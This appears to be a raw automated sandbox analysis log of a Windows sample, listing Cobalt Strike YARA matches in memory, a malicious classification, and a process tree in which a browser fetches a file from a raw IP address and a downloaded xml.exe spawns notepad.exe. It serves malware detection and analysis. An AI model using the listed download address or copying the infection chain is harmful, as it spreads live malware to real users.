Source: C:\Users\user\Downloads\xml.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: winnsi.dll

Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload

Source: classification engine

Classification label: mal100.troj.evad.win@112/227@12/122

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\Downloads\ff832fe5-5854-443c-a430-eabe8a426ebb.tmp

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF2E90A9110A4AC96B.TMP

Source: C:\Program Files\Internet Explorer\iexplore.exe

File read: C:\Users\desktop.ini

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://213.109.202.222/download/xml.xml
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1956,i,12291376917359172718,11941003201960649929,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe cookie_exporter.exe --cookie-json=1148
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\Downloads\xml.exe "C:\Users\user\Downloads\xml.exe"
Source: C:\Users\user\Downloads\xml.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\xml.exe	Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
